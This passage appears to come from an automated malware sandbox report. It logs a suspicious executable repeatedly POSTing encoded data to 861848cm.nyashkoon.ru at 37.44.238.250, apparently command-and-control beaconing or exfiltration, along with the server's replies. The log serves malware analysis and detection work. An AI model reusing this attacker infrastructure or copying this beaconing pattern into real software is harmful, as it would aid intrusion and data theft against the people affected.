                                                                                            Data Ascii: VQZTV[UXZ_RQT\[ZUTYWQWRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,*?(Y<(*5*=*\%+77?%++Y,%_4%9'X$.Q->
                                                                                            Nov 5, 2024 23:52:36.008297920 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:36.079199076 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.44974337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:36.223640919 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:36.574080944 CET1024OUTData Raw: 56 52 5f 5b 56 58 50 5f 5a 5f 52 51 54 59 5b 5e 55 53 59 57 51 56 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VR_[VXP_Z_RQTY[^USYWQVRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,%+0Y?3=![)[*3+#,%?4:47&X%)'X$.Q-*
                                                                                            Nov 5, 2024 23:52:37.035279036 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:37.105963945 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.44974537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:37.236274958 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:37.586878061 CET1024OUTData Raw: 56 55 5a 55 56 5d 50 53 5a 5f 52 51 54 5e 5b 59 55 56 59 5c 51 54 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VUZUV]PSZ_RQT^[YUVY\QTR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,<8>0 [*:&)[!0+?#?*(?.5Y!7&^1'X$.Q-6
                                                                                            Nov 5, 2024 23:52:38.262613058 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:38.262666941 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:52:38.262705088 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.44974637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:38.431940079 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:38.790508032 CET1024OUTData Raw: 56 50 5a 5e 56 5e 50 53 5a 5f 52 51 54 53 5b 5d 55 57 59 5a 51 54 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VPZ^V^PSZ_RQTS[]UWYZQTRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,?"W?(<_+#Y=:="';#+',%#'%)'X$.Q-


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.44974837.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:39.062621117 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:39.415720940 CET1284OUTData Raw: 53 54 5f 5f 56 57 50 52 5a 5f 52 51 54 5b 5b 5b 55 52 59 5f 51 56 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: ST__VWPRZ_RQT[[[URY_QVR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;>+7(\)>?-=%;(X .W<-7[96 #&'X$.Q-"
                                                                                            Nov 5, 2024 23:52:39.864979982 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:39.940107107 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 14 3c 04 04 13 27 3b 24 53 29 10 3a 07 29 30 33 5f 2f 54 2c 11 3e 0d 01 05 2a 2b 20 50 34 3f 0d 1a 36 31 2a 00 37 0c 2f 5b 29 3b 21 5f 05 1d 39 5b 30 17 2c 51 3e 0c 0b 05 3d 09 28 0a 25 30 37 18 29 05 08 5b 20 04 3e 57 26 58 2d 11 31 0b 28 0c 3f 34 2d 5d 2e 2f 28 0f 25 3a 2a 57 09 16 20 55 24 55 24 01 29 31 24 06 25 2e 35 10 32 39 3f 54 2a 3c 23 12 34 27 36 17 3d 0d 2b 58 23 24 3e 1e 26 2a 3e 40 25 3e 05 51 3f 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: <';$S):)03_/T,>*+ P4?61*7/[);!_9[0,Q>=(%07)[ >W&X-1(?4-]./(%:*W U$U$)1$%.529?T*<#4'6=+X#$>&*>@%>Q?&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.44974937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:39.202200890 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:39.555944920 CET1024OUTData Raw: 53 55 5a 59 56 5f 55 5e 5a 5f 52 51 54 5f 5b 59 55 57 59 5e 51 56 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZYV_U^Z_RQT_[YUWY^QVRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\8?"U=(#>#8\*?="$8 -)=?- 4')&'X$.Q-2
                                                                                            Nov 5, 2024 23:52:40.024277925 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:40.101548910 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.44975137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:40.238478899 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:40.590897083 CET1024OUTData Raw: 53 54 5a 5b 53 5c 50 59 5a 5f 52 51 54 5d 5b 5b 55 5c 59 57 51 53 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZ[S\PYZ_RQT][[U\YWQSR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/<><8(> ;>:=>53/#%?>#].C##72X&)'X$.Q-
                                                                                            Nov 5, 2024 23:52:41.049932003 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:41.125943899 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            11192.168.2.44975237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:41.383840084 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:41.743778944 CET1024OUTData Raw: 53 54 5a 55 56 58 50 5d 5a 5f 52 51 54 5d 5b 5f 55 50 59 56 51 56 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZUVXP]Z_RQT][_UPYVQVRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/Y>+8<_<0](*5_)]0(#4<-?3Z9,#&\'9'X$.Q-
                                                                                            Nov 5, 2024 23:52:42.205102921 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:42.273930073 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            12192.168.2.44975337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:42.517615080 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:42.867999077 CET1024OUTData Raw: 53 53 5a 5f 56 5e 55 5e 5a 5f 52 51 54 5d 5b 52 55 53 59 5e 51 55 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SSZ_V^U^Z_RQT][RUSY^QUR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\8<5+ ]<U8X(95_)=9$/ /1(-/-<X!$:^&)'X$.Q-
                                                                                            Nov 5, 2024 23:52:43.338536024 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:43.409671068 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:41 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            13192.168.2.44975437.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:43.607105970 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:43.961815119 CET1024OUTData Raw: 53 53 5a 55 53 5a 55 5e 5a 5f 52 51 54 5d 5b 59 55 57 59 58 51 52 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SSZUSZU^Z_RQT][YUWYXQRR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%_,/6(7>#0Y*\!Y=[)38<[ 1+>+Y-/47"X')'X$.Q-
                                                                                            Nov 5, 2024 23:52:44.419316053 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:44.492446899 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            14192.168.2.44975537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:44.620465994 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            15192.168.2.44975637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:44.952656984 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:45.305617094 CET1264OUTData Raw: 56 56 5a 54 56 59 55 5d 5a 5f 52 51 54 5b 5b 5e 55 52 59 5c 51 53 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VVZTVYU]Z_RQT[[^URY\QSRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;5+;+>3$*=_)=>[08, 9( ./7=&)'X$.Q-"
                                                                                            Nov 5, 2024 23:52:45.772169113 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:45.851747036 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:43 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 17 2b 2a 22 5b 24 2b 2f 08 3d 00 03 59 29 30 20 06 3b 32 02 58 3e 1d 20 5c 2a 06 3c 18 37 01 2b 1a 35 0c 21 10 21 22 2c 03 29 3b 21 5f 05 1d 3a 01 24 5f 20 12 29 31 39 05 3e 19 2b 19 27 20 0a 42 29 05 22 11 20 3a 3d 0e 32 07 2d 12 27 31 37 55 2b 0a 22 03 2d 11 2b 54 32 00 2a 57 09 16 20 57 27 30 3f 5e 29 31 20 00 27 3e 3a 06 26 29 27 1c 3d 3c 2f 5d 21 24 3a 59 29 1d 2f 13 22 24 31 05 26 3a 22 42 25 00 23 56 2b 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: +*"[$+/=Y)0 ;2X> \*<7+5!!",);!_:$_ )19>+' B)" :=2-'17U+"-+T2*W W'0?^)1 '>:&)'=</]!$:Y)/"$1&:"B%#V+&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            16192.168.2.44975737.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:45.075854063 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:45.430764914 CET1024OUTData Raw: 53 51 5a 5f 56 59 50 58 5a 5f 52 51 54 5d 5b 58 55 54 59 5b 51 50 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SQZ_VYPXZ_RQT][XUTY[QPRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X/?<^$X?$\>*)[6^%;4_4!+-$#712)'X$.Q-
                                                                                            Nov 5, 2024 23:52:45.897156954 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:45.965421915 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:43 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            17192.168.2.44975837.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:46.293800116 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:46.649306059 CET1024OUTData Raw: 56 52 5a 59 53 5c 55 58 5a 5f 52 51 54 52 5b 58 55 57 59 5e 51 56 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VRZYS\UXZ_RQTR[XUWY^QVR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%8?2U<$_>#+)*!_>-38"?%?=?]9%#7_%'X$.Q-
                                                                                            Nov 5, 2024 23:52:47.105568886 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:47.175134897 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            18192.168.2.44975937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:47.310585022 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
